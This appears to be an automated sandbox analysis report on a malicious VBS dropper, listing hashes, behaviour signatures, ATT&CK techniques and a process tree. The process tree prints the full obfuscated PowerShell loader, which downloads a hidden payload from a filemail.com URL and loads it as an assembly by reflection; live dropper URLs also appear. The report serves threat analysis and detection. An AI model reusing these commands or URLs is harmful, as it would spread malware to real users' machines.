c35fb5adc491eb8c62504f7d88e8809a7d273b29851a6a66b6155936d07acea3

General

Target

c35fb5adc491eb8c62504f7d88e8809a7d273b29851a6a66b6155936d07acea3.vbs
Size

11KB
MD5

2c6472b80d9ffbbb9a68c8dc0ff6fb19
SHA1

a7c487f72bb59453014912b36610d254452fa87a
SHA256

c35fb5adc491eb8c62504f7d88e8809a7d273b29851a6a66b6155936d07acea3
SHA512

f541e67826d489f8b6694ead8486acbf6dc64fbbf624006404a842549b896a0590170a68dba624fd3c99dfc3772d7390deed23479700e2cb3354e5b20fd054b4
SSDEEP

192:TXHapAOg8/W/MnmbKMpuLMEyTeFQnu3mdOLkL7Fi:TXjU8k3mOkw

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exepowershell.exe

flow	pid	Process
3	1020	WScript.exe
4	1020	WScript.exe
8	2684	powershell.exe
9	2684	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2152	powershell.exe
2684	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2152	powershell.exe
2684	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.exeWScript.exepowershell.exe

description	pid	Process	procid_target
PID 2460 wrote to memory of 1020	2460	WScript.exe	31
PID 2460 wrote to memory of 1020	2460	WScript.exe	31
PID 2460 wrote to memory of 1020	2460	WScript.exe	31
PID 1020 wrote to memory of 2152	1020	WScript.exe	32
PID 1020 wrote to memory of 2152	1020	WScript.exe	32
PID 1020 wrote to memory of 2152	1020	WScript.exe	32
PID 2152 wrote to memory of 2684	2152	powershell.exe	34
PID 2152 wrote to memory of 2684	2152	powershell.exe	34
PID 2152 wrote to memory of 2684	2152	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c35fb5adc491eb8c62504f7d88e8809a7d273b29851a6a66b6155936d07acea3.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2460
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lhkienstecrzljq.vbs"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdGdktpbWFnZVVybCA9IHdGbGh0dHBzOi8vMTAxNy5maWxlbWFpbC4nKydjb20vYXBpLycrJ2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NCcrJzUxNzZhMDkwNGYgd0ZsO0Z2S3dlYkNsaWVudCA9JysnIE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JysnRnZLaW1hZ2VCeXRlcyA9IEZ2S3dlYkNsaWVuJysndC5Eb3dubG9hJysnZERhdGEoRnZLaW1hZ2VVcmwpO0Z2S2ltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEZ2S2ltYWdlQnl0ZScrJ3MpO0Z2S3N0YXJ0RmxhZyA9IHdGbDw8QkFTRTY0X1NUQVJUPj53Rmw7RnZLZW5kRmxhZyA9IHdGbDw8QkFTRTY0X0VORD4+d0ZsO0Z2S3N0YXJ0SW5kZXggPSBGdktpbWFnZVRleCcrJ3QuSW5kZXhPZihGdktzdGFydEZsYWcpO0Z2S2VuZEluZGV4ID0gRnZLaW1hZ2VUZXh0LkluZGV4T2YoRnZLZW5kRmxhZyk7RnZLc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIEZ2S2VuZEluZGV4IC1ndCBGdktzdGFydEluZGV4O0Z2S3N0YXJ0SW5kZXggKz0gRnZLc3RhcnRGbGFnLkxlbmd0aDtGdicrJ0tiYXNlNjRMZW5ndGggPSBGdktlbmRJbmRleCAtIEZ2S3N0YXJ0SW5kZXg7RnZLYmFzZTY0Q29tbWFuZCA9IEZ2S2ltYWdlVGV4dC5TdWJzdHJpbmcoRnZLc3RhcnRJbmQnKydleCwgRnZLYmFzZTY0TGVuZ3RoKTtGdktiYScrJ3NlNjRSZScrJ3ZlcnNlZCA9IC1qb2luIChGdktiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgOFh2IEZvckVhY2gtT2JqZWN0IHsgRnZLXyB9KVsnKyctMS4uLShGdktiYXNlNjRDb21tYW5kLkxlbmd0aCldO0Z2S2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkZyb21CYXMnKydlNjRTdHJpbmcoRnZLYicrJ2FzZTY0UmV2ZXJzZWQpO0Z2S2xvYWRlZEFzc2VtYmx5ID0nKycgW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChGJysndktjb21tYW5kQnl0ZXMpO0Z2S3ZhaU1ldGhvZCcrJyA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2Qod0ZsVkFJd0ZsKTtGJysndkt2YWlNZXRob2QuSW52b2tlKEZ2S251bGwsIEAodycrJ0ZsdHh0LmRzdGVwL3BvcC91ZS5wcmcnKyd4YW15Z3JlbmUuZ2lnLy86cHR0aHdGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsMXdGbCwgdycrJ0ZsT25lRHJpdmVTZXR1cHdGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCx3RmxkZXNhdGl2YWRvd0ZsLHdGbGRlc2F0aXZhZG93Rmwsd0ZsZGVzYXRpdmFkb3dGbCx3Rmwxd0ZsLHdGbGRlc2F0aXZhZG93RmwpKScrJzsnKS5SZXBsQWNFKCd3RmwnLFtzVFJJbkddW0NoQXJdMzkpLlJlcGxBY0UoKFtDaEFyXTcwK1tDaEFyXTExOCtbQ2hBcl03NSksJyQnKS5SZXBsQWNFKChbQ2hBcl01NitbQ2hBcl04OCtbQ2hBcl0xMTgpLCd8JykgfCYgKCAkVkVSYm9zZXByZUZlcmVuQ2UuVG9zVFJJbkcoKVsxLDNdKydYJy1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('FvKimageUrl = wFlhttps://1017.filemail.'+'com/api/'+'file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c173094'+'5176a0904f wFl;FvKwebClient ='+' New-Object System.Net.WebClient;'+'FvKimageBytes = FvKwebClien'+'t.Downloa'+'dData(FvKimageUrl);FvKimageText = [System.Text.Encoding]::UTF8.GetString(FvKimageByte'+'s);FvKstartFlag = wFl<<BASE64_START>>wFl;FvKendFlag = wFl<<BASE64_END>>wFl;FvKstartIndex = FvKimageTex'+'t.IndexOf(FvKstartFlag);FvKendIndex = FvKimageText.IndexOf(FvKendFlag);FvKstartIndex -ge '+'0 -and FvKendIndex -gt FvKstartIndex;FvKstartIndex += FvKstartFlag.Length;Fv'+'Kbase64Length = FvKendIndex - FvKstartIndex;FvKbase64Command = FvKimageText.Substring(FvKstartInd'+'ex, FvKbase64Length);FvKba'+'se64Re'+'versed = -join (FvKbase64Command.ToCharArray() 8Xv ForEach-Object { FvK_ })['+'-1..-(FvKbase64Command.Length)];FvKcommandBytes = [System.Convert'+']::FromBas'+'e64String(FvKb'+'ase64Reversed);FvKloadedAssembly ='+' [System.Reflectio'+'n.Assembly]::Load(F'+'vKcommandBytes);FvKvaiMethod'+' = [dnlib.IO.Home].GetMethod(wFlVAIwFl);F'+'vKvaiMethod.Invoke(FvKnull, @(w'+'Fltxt.dstep/pop/ue.prg'+'xamygrene.gig//:ptthwFl, wFldesativadowFl, wFldesativadowFl, wFldesativadowFl, wFldesativadowFl, wFl1wFl, w'+'FlOneDriveSetupwFl, wFldesativadowFl, wFldesativadowFl,wFldesativadowFl,wFldesativadowFl,wFldesativadowFl,wFl1wFl,wFldesativadowFl))'+';').ReplAcE('wFl',[sTRInG][ChAr]39).ReplAcE(([ChAr]70+[ChAr]118+[ChAr]75),'$').ReplAcE(([ChAr]56+[ChAr]88+[ChAr]118),'|') |& ( $VERbosepreFerenCe.TosTRInG()[1,3]+'X'-JoIN'')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\lhkienstecrzljq.vbs

Filesize
1KB

MD5
a82f4032d41676a0b73ed0812494840e

SHA1
72dc7035344b30d2430fb851f383070dc3d1e364

SHA256
b03c7f247ea3d720f27e34e0975cb0b3a04100a2222bc86bce6c210eb8d352d0

SHA512
42c3a17ec824725cd157ba4af541b2c3d36c371297e836906de4f9e310a8d9f8bfeb9a835e1d0eb39807d11422c20fa1d54875065c2188874678776c0124ba01

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f6a150f3811c181aca976c70aee7b6a6

SHA1
d4e7c843afc428283c89f348040b25867e7d0441

SHA256
85b3604c93662ddb3d3023fb4f77f91dbb5e675bf62a6d29e91585a39b2bd13b

SHA512
d8d45bc1a83f1266cc0d8c7f2b77056278f6d574a31412fc1c232b136f3b1a1355232badf5ff054af465b491b6bbb6e274e48a949c35add2c15184a0d9c55ffe

Download Submit
memory/2152-8-0x000000001B4B0000-0x000000001B792000-memory.dmp

Filesize
2.9MB

Download
memory/2152-9-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads